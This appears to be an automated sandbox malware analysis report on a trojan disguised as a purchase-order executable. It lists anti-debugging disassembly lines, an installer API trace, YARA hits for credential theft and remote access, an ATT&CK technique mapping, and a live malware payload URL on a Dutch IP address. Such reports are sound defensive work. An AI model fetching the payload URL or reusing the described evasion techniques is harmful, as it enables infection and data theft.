      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov eax, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F3749 mov eax, dword ptr fs:[00000030h]11_2_348F3749
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B765 mov eax, dword ptr fs:[00000030h]11_2_3481B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B765 mov eax, dword ptr fs:[00000030h]11_2_3481B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B765 mov eax, dword ptr fs:[00000030h]11_2_3481B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B765 mov eax, dword ptr fs:[00000030h]11_2_3481B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AD080 mov eax, dword ptr fs:[00000030h]11_2_348AD080
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AD080 mov eax, dword ptr fs:[00000030h]11_2_348AD080
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D08D mov eax, dword ptr fs:[00000030h]11_2_3481D08D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34825096 mov eax, dword ptr fs:[00000030h]11_2_34825096
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D090 mov eax, dword ptr fs:[00000030h]11_2_3484D090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D090 mov eax, dword ptr fs:[00000030h]11_2_3484D090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485909C mov eax, dword ptr fs:[00000030h]11_2_3485909C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D0C0 mov eax, dword ptr fs:[00000030h]11_2_3489D0C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D0C0 mov eax, dword ptr fs:[00000030h]11_2_3489D0C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F50D9 mov eax, dword ptr fs:[00000030h]11_2_348F50D9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348490DB mov eax, dword ptr fs:[00000030h]11_2_348490DB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348450E4 mov eax, dword ptr fs:[00000030h]11_2_348450E4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348450E4 mov ecx, dword ptr fs:[00000030h]11_2_348450E4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E903E mov eax, dword ptr fs:[00000030h]11_2_348E903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E903E mov eax, dword ptr fs:[00000030h]11_2_348E903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E903E mov eax, dword ptr fs:[00000030h]11_2_348E903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E903E mov eax, dword ptr fs:[00000030h]11_2_348E903E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484B052 mov eax, dword ptr fs:[00000030h]11_2_3484B052
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A106E mov eax, dword ptr fs:[00000030h]11_2_348A106E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5060 mov eax, dword ptr fs:[00000030h]11_2_348F5060
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831070 mov eax, dword ptr fs:[00000030h]11_2_34831070
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ABC10 mov ecx, dword ptr fs:[00000030h]11_2_348ABC10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EDC27 mov eax, dword ptr fs:[00000030h]11_2_348EDC27
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EDC27 mov eax, dword ptr fs:[00000030h]11_2_348EDC27
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EDC27 mov eax, dword ptr fs:[00000030h]11_2_348EDC27
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F1C3C mov eax, dword ptr fs:[00000030h]11_2_348F1C3C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BC3B mov esi, dword ptr fs:[00000030h]11_2_3485BC3B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817C40 mov eax, dword ptr fs:[00000030h]11_2_34817C40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817C40 mov ecx, dword ptr fs:[00000030h]11_2_34817C40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817C40 mov eax, dword ptr fs:[00000030h]11_2_34817C40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817C40 mov eax, dword ptr fs:[00000030h]11_2_34817C40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFC4F mov eax, dword ptr fs:[00000030h]11_2_348DFC4F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831C60 mov eax, dword ptr fs:[00000030h]11_2_34831C60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34851C7C mov eax, dword ptr fs:[00000030h]11_2_34851C7C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481FD80 mov eax, dword ptr fs:[00000030h]11_2_3481FD80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819D96 mov eax, dword ptr fs:[00000030h]11_2_34819D96
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819D96 mov eax, dword ptr fs:[00000030h]11_2_34819D96
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819D96 mov ecx, dword ptr fs:[00000030h]11_2_34819D96
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34859DAF mov eax, dword ptr fs:[00000030h]11_2_34859DAF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DDB1 mov eax, dword ptr fs:[00000030h]11_2_3483DDB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DDB1 mov eax, dword ptr fs:[00000030h]11_2_3483DDB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DDB1 mov eax, dword ptr fs:[00000030h]11_2_3483DDB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADDB1 mov eax, dword ptr fs:[00000030h]11_2_348ADDB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EDDC6 mov eax, dword ptr fs:[00000030h]11_2_348EDDC6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADDC0 mov eax, dword ptr fs:[00000030h]11_2_348ADDC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DDDC7 mov eax, dword ptr fs:[00000030h]11_2_348DDDC7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823DD0 mov eax, dword ptr fs:[00000030h]11_2_34823DD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823DD0 mov eax, dword ptr fs:[00000030h]11_2_34823DD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34833D00 mov eax, dword ptr fs:[00000030h]11_2_34833D00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AFD2A mov eax, dword ptr fs:[00000030h]11_2_348AFD2A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AFD2A mov eax, dword ptr fs:[00000030h]11_2_348AFD2A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34833D20 mov eax, dword ptr fs:[00000030h]11_2_34833D20
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817D41 mov eax, dword ptr fs:[00000030h]11_2_34817D41
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BD4E mov eax, dword ptr fs:[00000030h]11_2_3485BD4E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BD4E mov eax, dword ptr fs:[00000030h]11_2_3485BD4E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADD47 mov eax, dword ptr fs:[00000030h]11_2_348ADD47
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A mov eax, dword ptr fs:[00000030h]11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A mov eax, dword ptr fs:[00000030h]11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A mov eax, dword ptr fs:[00000030h]11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A mov eax, dword ptr fs:[00000030h]11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827D75 mov eax, dword ptr fs:[00000030h]11_2_34827D75
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827D75 mov eax, dword ptr fs:[00000030h]11_2_34827D75
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34853E8F mov eax, dword ptr fs:[00000030h]11_2_34853E8F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADE9B mov eax, dword ptr fs:[00000030h]11_2_348ADE9B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827E96 mov eax, dword ptr fs:[00000030h]11_2_34827E96
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADEAA mov eax, dword ptr fs:[00000030h]11_2_348ADEAA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481FEA0 mov eax, dword ptr fs:[00000030h]11_2_3481FEA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481DEA5 mov eax, dword ptr fs:[00000030h]11_2_3481DEA5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481DEA5 mov ecx, dword ptr fs:[00000030h]11_2_3481DEA5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov eax, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov ecx, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov eax, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov eax, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov eax, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DDEB0 mov eax, dword ptr fs:[00000030h]11_2_348DDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481BEC0 mov eax, dword ptr fs:[00000030h]11_2_3481BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481BEC0 mov eax, dword ptr fs:[00000030h]11_2_3481BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484FEC0 mov eax, dword ptr fs:[00000030h]11_2_3484FEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AFEC5 mov eax, dword ptr fs:[00000030h]11_2_348AFEC5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823EE1 mov eax, dword ptr fs:[00000030h]11_2_34823EE1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34853EEB mov ecx, dword ptr fs:[00000030h]11_2_34853EEB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34853EEB mov eax, dword ptr fs:[00000030h]11_2_34853EEB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34853EEB mov eax, dword ptr fs:[00000030h]11_2_34853EEB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823EF4 mov eax, dword ptr fs:[00000030h]11_2_34823EF4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823EF4 mov eax, dword ptr fs:[00000030h]11_2_34823EF4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823EF4 mov eax, dword ptr fs:[00000030h]11_2_34823EF4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481DE10 mov eax, dword ptr fs:[00000030h]11_2_3481DE10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DE2D mov eax, dword ptr fs:[00000030h]11_2_3483DE2D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DE2D mov eax, dword ptr fs:[00000030h]11_2_3483DE2D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DE2D mov eax, dword ptr fs:[00000030h]11_2_3483DE2D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821E30 mov eax, dword ptr fs:[00000030h]11_2_34821E30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821E30 mov eax, dword ptr fs:[00000030h]11_2_34821E30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34835E40 mov eax, dword ptr fs:[00000030h]11_2_34835E40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DDE46 mov eax, dword ptr fs:[00000030h]11_2_348DDE46
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BE51 mov eax, dword ptr fs:[00000030h]11_2_3485BE51
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BE51 mov eax, dword ptr fs:[00000030h]11_2_3485BE51
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C9E56 mov ecx, dword ptr fs:[00000030h]11_2_348C9E56
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481BE78 mov ecx, dword ptr fs:[00000030h]11_2_3481BE78
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov eax, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov eax, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, Process created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, Code function: 5_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess

      Stealing of Sensitive Information

      Source: Yara match, File source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match, File source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
      Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
      Persistence: Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Privilege Escalation: Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Network Logon Script; RC Scripts
      Defense Evasion: Masquerading (11); Access Token Manipulation (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
      Discovery: Security Software Discovery (211); File and Directory Discovery (3); System Information Discovery (23); System Network Configuration Discovery; Internet Connection Discovery; Wi-Fi Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
      Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
      Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
      Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

      Source | Detection | Scanner | Label
      Purchase Order Purchase Order Purchase Order Purchase Order.exe | 27% | ReversingLabs | Win32.Trojan.Generic

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | 3% | ReversingLabs |

      No Antivirus matches

      No Antivirus matches

      Source | Detection | Scanner | Label
      http://185.222.57.90/zFSrvbrRquo53.binj | 0% | Avira URL Cloud | safe
      http://185.222.57.90/ | 0% | Avira URL Cloud | safe
      http://185.222.57.90/zFSrvbrRquo53.bin55 | 0% | Avira URL Cloud | safe
      http://185.222.57.90/zFSrvbrRquo53.bin | 100% | Avira URL Cloud | malware

      No contacted domains info

      Name | Malicious | Antivirus Detection | Reputation
      http://185.222.57.90/zFSrvbrRquo53.bin | false | Avira URL Cloud: malware | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | false | | high
      http://www.ftp.ftp://ftp.gopher. | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp | false | | high
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | false | | high
      http://nsis.sf.net/NSIS_ErrorError | Purchase Order Purchase Order Purchase Order Purchase Order.exe | false | | high
      http://185.222.57.90/zFSrvbrRquo53.bin55 | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://185.222.57.90/zFSrvbrRquo53.binj | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.00000000046C6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp | false | | high
      http://185.222.57.90/ | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

      IP | Domain | Country | ASN | ASN Name | Malicious
      185.222.57.90 | unknown | Netherlands | 51447 | ROOTLAYERNETNL | false

      Joe Sandbox version: 41.0.0 Charoite
      Analysis ID: 1557894
      Start date and time: 2024-11-18 18:17:24 +01:00
      Joe Sandbox product: CloudBasic
      Overall analysis duration: 0h 8m 27s
      Hypervisor based Inspection enabled: false
      Report type: full
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name: Run with higher sleep bypass
      Number of analysed new started processes analysed: 15
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Sample name: Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Detection: MAL
      Classification: mal88.troj.evad.winEXE@3/8@0/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 90%
      • Number of executed functions: 47
      • Number of non-executed functions: 302
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • VT rate limit hit for: Purchase Order Purchase Order Purchase Order Purchase Order.exe

      No simulations

      Match | Associated Sample Name / URL | Detection | Threat Name | Context
